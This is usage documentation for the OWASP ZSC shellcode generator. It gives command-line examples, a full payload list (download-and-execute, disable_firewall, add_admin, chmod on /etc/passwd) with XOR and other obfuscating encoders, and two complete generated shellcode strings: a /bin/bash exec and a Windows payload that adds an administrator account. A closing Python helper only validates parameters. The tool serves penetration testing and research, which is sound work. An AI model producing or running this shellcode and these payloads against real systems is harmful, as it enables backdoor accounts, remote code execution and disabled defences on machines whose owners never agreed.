Command line ZSC
OWASP ZSC can generate shellcode directly from the command line, or you can use the interactive shell to drill down into the available payloads and explore their options and features. If you are not yet familiar with ZSC, we recommend trying the interactive shell first to learn about the payloads' parameters and options.
Examples of zsc from the command line
To get a list of examples of how to use the command line, run
zsc -e
[+] zsc.py --show-payloads
[+] zsc.py --show-payloads windows
[+] zsc.py -l php
[+] zsc.py --shell-storm search word1
[+] zsc.py -s search "word1 word2"
[+] zsc.py -s download id
[+] zsc.py -s download id -o shellcode.c
[+] zsc.py --payload windows_x86/system/mix_all --input "ls -la"
[+] zsc.py -p linux_x86/chmod/xor_random -i "/etc/passwd~~~777"
[+] zsc.py --payload osx_x86/system/none --input "ls -la" --assembly-code
[+] zsc.py -p linux_x86/write/inc -i "/etc/passwd~~~ali" -c
[+] zsc.py -p linux_x86/system/dec_15 -i "dir" --output shellcode.c
[+] zsc.py -p windows_x86/exec/add_0x4b5ff271 -i "calc.exe" -o shellcode.c
[+] zsc.py -p php/simple_hex -i "/path/file.php"
Featured Payloads
To get a complete list of all the available payloads, use the following command:
python zsc.py -l
This will output a complete list of all the available payloads and their options:
[!] Note: Shellcode Payloads Sorted By OperatingSystem_Architecture/Function_Name/Encode_Name
[!] Note: Programming Languages Payloads Sorted By ProgrammingLanguagesName/Encode_Name
[!] system('command_to_execute')
[+] osx_x86/system/none
[!] chmod('file_to_perm','perm_number')
[+] osx_x86/chmod/none
[!] exec('file_to_execute')
[+] osx_x86/exec/none
[!] add_admin('username','password')
[+] windows_x86/add_admin/none
[+] windows_x86/add_admin/xor_random
[+] windows_x86/add_admin/add_random
[+] windows_x86/add_admin/sub_random
[+] windows_x86/add_admin/xor_yourvalue
[!] download_exec('url','filename')
[+] windows_x86/download_exec/none
[+] windows_x86/download_exec/xor_random
[+] windows_x86/download_exec/add_random
[+] windows_x86/download_exec/sub_random
[+] windows_x86/download_exec/xor_yourvalue
[!] exec('file_to_execute')
[+] windows_x86/exec/none
[+] windows_x86/exec/xor_random
[+] windows_x86/exec/add_random
[+] windows_x86/exec/sub_random
[+] windows_x86/exec/xor_yourvalue
[!] disable_firewall()
[+] windows_x86/disable_firewall/none
[+] windows_x86/disable_firewall/xor_random
[+] windows_x86/disable_firewall/add_random
[+] windows_x86/disable_firewall/sub_random
[+] windows_x86/disable_firewall/xor_yourvalue
[!] download_tofile('url','filename')
[+] windows_x86/download_tofile/none
[+] windows_x86/download_tofile/xor_random
[+] windows_x86/download_tofile/add_random
[+] windows_x86/download_tofile/sub_random
[+] windows_x86/download_tofile/xor_yourvalue
[!] create_file('filename','content')
[+] windows_x86/create_file/none
[+] windows_x86/create_file/xor_random
[+] windows_x86/create_file/add_random
[+] windows_x86/create_file/sub_random
[+] windows_x86/create_file/xor_yourvalue
[!] dir_create('directory_to_create')
[+] windows_x86/dir_create/none
[+] windows_x86/dir_create/xor_random
[+] windows_x86/dir_create/add_random
[+] windows_x86/dir_create/sub_random
[+] windows_x86/dir_create/xor_yourvalue
[!] download_execute('download_url','filename','command_to_execute')
[+] linux_x86/download_execute/none
[+] linux_x86/download_execute/xor_random
[+] linux_x86/download_execute/xor_yourvalue
[+] linux_x86/download_execute/add_random
[+] linux_x86/download_execute/add_yourvalue
[+] linux_x86/download_execute/sub_random
[+] linux_x86/download_execute/sub_yourvalue
[+] linux_x86/download_execute/inc
[+] linux_x86/download_execute/inc_timesyouwant
[+] linux_x86/download_execute/dec
[+] linux_x86/download_execute/dec_timesyouwant
[+] linux_x86/download_execute/mix_all
[!] write('file_to_write','content')
[+] linux_x86/write/none
[+] linux_x86/write/xor_random
[+] linux_x86/write/xor_yourvalue
[+] linux_x86/write/add_random
[+] linux_x86/write/add_yourvalue
[+] linux_x86/write/sub_random
[+] linux_x86/write/sub_yourvalue
[+] linux_x86/write/inc
[+] linux_x86/write/inc_timesyouwant
[+] linux_x86/write/dec
[+] linux_x86/write/dec_timesyouwant
[+] linux_x86/write/mix_all
[!] file_create('filename','content')
[+] linux_x86/file_create/none
[+] linux_x86/file_create/xor_random
[+] linux_x86/file_create/xor_yourvalue
[+] linux_x86/file_create/add_random
[+] linux_x86/file_create/add_yourvalue
[+] linux_x86/file_create/sub_random
[+] linux_x86/file_create/sub_yourvalue
[+] linux_x86/file_create/inc
[+] linux_x86/file_create/inc_timesyouwant
[+] linux_x86/file_create/dec
[+] linux_x86/file_create/dec_timesyouwant
[+] linux_x86/file_create/mix_all
[!] dir_create('directory_to_create')
[+] linux_x86/dir_create/none
[+] linux_x86/dir_create/xor_random
[+] linux_x86/dir_create/xor_yourvalue
[+] linux_x86/dir_create/add_random
[+] linux_x86/dir_create/add_yourvalue
[+] linux_x86/dir_create/sub_random
[+] linux_x86/dir_create/sub_yourvalue
[+] linux_x86/dir_create/inc
[+] linux_x86/dir_create/inc_timesyouwant
[+] linux_x86/dir_create/dec
[+] linux_x86/dir_create/dec_timesyouwant
[+] linux_x86/dir_create/mix_all
[!] exec('file_to_execute')
[+] linux_x86/exec/none
[+] linux_x86/exec/xor_random
[+] linux_x86/exec/xor_yourvalue
[+] linux_x86/exec/add_random
[+] linux_x86/exec/add_yourvalue
[+] linux_x86/exec/sub_random
[+] linux_x86/exec/sub_yourvalue
[+] linux_x86/exec/inc
[+] linux_x86/exec/inc_timesyouwant
[+] linux_x86/exec/dec
[+] linux_x86/exec/dec_timesyouwant
[+] linux_x86/exec/mix_all
[!] download('download_url','filename')
[+] linux_x86/download/none
[+] linux_x86/download/xor_random
[+] linux_x86/download/xor_yourvalue
[+] linux_x86/download/add_random
[+] linux_x86/download/add_yourvalue
[+] linux_x86/download/sub_random
[+] linux_x86/download/sub_yourvalue
[+] linux_x86/download/inc
[+] linux_x86/download/inc_timesyouwant
[+] linux_x86/download/dec
[+] linux_x86/download/dec_timesyouwant
[+] linux_x86/download/mix_all
[!] script_executor('name_of_script','name_of_your_script_in_your_pc','execute_to_command')
[+] linux_x86/script_executor/none
[+] linux_x86/script_executor/xor_random
[+] linux_x86/script_executor/xor_yourvalue
[+] linux_x86/script_executor/add_random
[+] linux_x86/script_executor/add_yourvalue
[+] linux_x86/script_executor/sub_random
[+] linux_x86/script_executor/sub_yourvalue
[+] linux_x86/script_executor/inc
[+] linux_x86/script_executor/inc_timesyouwant
[+] linux_x86/script_executor/dec
[+] linux_x86/script_executor/dec_timesyouwant
[+] linux_x86/script_executor/mix_all
[!] system('command_to_execute')
[+] linux_x86/system/none
[+] linux_x86/system/xor_random
[+] linux_x86/system/xor_yourvalue
[+] linux_x86/system/add_random
[+] linux_x86/system/add_yourvalue
[+] linux_x86/system/sub_random
[+] linux_x86/system/sub_yourvalue
[+] linux_x86/system/inc
[+] linux_x86/system/inc_timesyouwant
[+] linux_x86/system/dec
[+] linux_x86/system/dec_timesyouwant
[+] linux_x86/system/mix_all
[!] chmod('file_to_perm','perm_number')
[+] linux_x86/chmod/none
[+] linux_x86/chmod/xor_random
[+] linux_x86/chmod/xor_yourvalue
[+] linux_x86/chmod/add_random
[+] linux_x86/chmod/add_yourvalue
[+] linux_x86/chmod/sub_random
[+] linux_x86/chmod/sub_yourvalue
[+] linux_x86/chmod/inc
[+] linux_x86/chmod/inc_timesyouwant
[+] linux_x86/chmod/dec
[+] linux_x86/chmod/dec_timesyouwant
[+] linux_x86/chmod/mix_all
[!] python
[+] python/simple_hex
[+] python/simple_hex_rev
[+] python/simple_base64_rev
[!] javascript
[+] javascript/simple_hex
[+] javascript/base64
[+] javascript/simple_hex_rev
[+] javascript/simple_base64_rev
[!] ruby
[+] ruby/simple_hex
[+] ruby/base64
[+] ruby/simple_hex_rev
[+] ruby/base64_rev
[!] php
[+] php/simple_hex
[+] php/base64
[+] php/simple_hex_rev
[+] php/base64_rev
[!] perl
[+] perl/simple_hex
[+] perl/base64
[+] perl/simple_hex_rev
[+] perl/simple_base64_rev
Selecting a payload
Based on this list, you can select a payload with the following command:
zsc -p osx_x86/exec/none -i /bin/bash
-p selects the payload and -i supplies its input parameters. When passing parameters, enclose them in double quotes ("parameter1"); if a payload requires more than one parameter, join them with ~~~:
"parameter1~~~parameter2"
This will generate the following shellcode:
[+] Generated shellcode is:
\x68\x90\x90\x90\x68\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\x52\x51\x53\xb0\x3b\x6a\x2a\xcd\x80\xb0\x01\xb3\x01\xcd\x80
Another example with more parameters (add_admin requires username and password):
[!] add_admin('username','password')
[+] windows_x86/add_admin/none
The command line:
zsc -p windows_x86/add_admin/none -i "mary~~~password"
will produce:
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x90\x90\x90\x64\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x68\x20\x2f\x61\x64\x68\x6d\x61\x72\x79\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x61\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x64\x64\x20\x26\x68\x64\x20\x2f\x61\x68\x73\x77\x6f\x72\x68\x20\x70\x61\x73\x68\x6d\x61\x72\x79\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x5c\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0
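As an added illustration (not part of the ZSC project's own code), the following Python helper parses the zsc -l listing format shown above and checks, before the tool is run, that a -i value carries the right number of ~~~-separated parameters for the chosen payload. The listing excerpt is constructed from this page, and the file_to_encode label used for language payloads is an assumption.

```python
import re

# Constructed excerpt of `zsc -l` output, in the format shown on this page:
# "[!] function(params)" headers followed by "[+] os_arch/function/encoder" paths,
# and "[!] language" headers followed by "[+] language/encoder" paths.
LISTING = """\
[!] chmod('file_to_perm','perm_number')
[+] linux_x86/chmod/none
[+] linux_x86/chmod/xor_random
[!] system('command_to_execute')
[+] osx_x86/system/none
[!] add_admin('username','password')
[+] windows_x86/add_admin/none
[!] php
[+] php/simple_hex
"""

SIG_RE = re.compile(r"^\[!\]\s+(\w+)\((.*)\)\s*$")   # [!] name('a','b')
LANG_RE = re.compile(r"^\[!\]\s+(\w+)\s*$")          # [!] php
PAYLOAD_RE = re.compile(r"^\[\+\]\s+(\S+)\s*$")      # [+] path/to/payload
SEP = "~~~"  # parameter separator used by -i, as documented above

def parse_listing(text):
    """Map each payload path to (function name, list of parameter names)."""
    table, func, params = {}, None, []
    for line in text.splitlines():
        if m := SIG_RE.match(line):
            func = m.group(1)
            params = [p.strip(" '") for p in m.group(2).split(",") if p.strip()]
        elif m := LANG_RE.match(line):
            # Language encoders take one input, the script file path.
            # "file_to_encode" is an assumed label, not a name ZSC uses.
            func, params = m.group(1), ["file_to_encode"]
        elif (m := PAYLOAD_RE.match(line)) and func is not None:
            table[m.group(1)] = (func, params)
    return table

def check_invocation(table, payload, input_value):
    """Validate `-p payload -i input_value` before running the tool.
    Returns (ok, message); the message shows how -i is split into arguments."""
    if payload not in table:
        return False, f"unknown payload {payload!r}"
    func, params = table[payload]
    args = input_value.split(SEP)
    if len(args) != len(params):
        return False, (f"{func} expects {len(params)} parameter(s) {params}, "
                       f"got {len(args)}: {args}")
    return True, f"{func}({', '.join(args)})"
```

For example, check_invocation(parse_listing(LISTING), "linux_x86/chmod/xor_random", "/etc/passwd~~~777") reports the call as chmod(/etc/passwd, 777), while passing "ls~~~-la" to osx_x86/system/none is flagged because system() takes a single parameter.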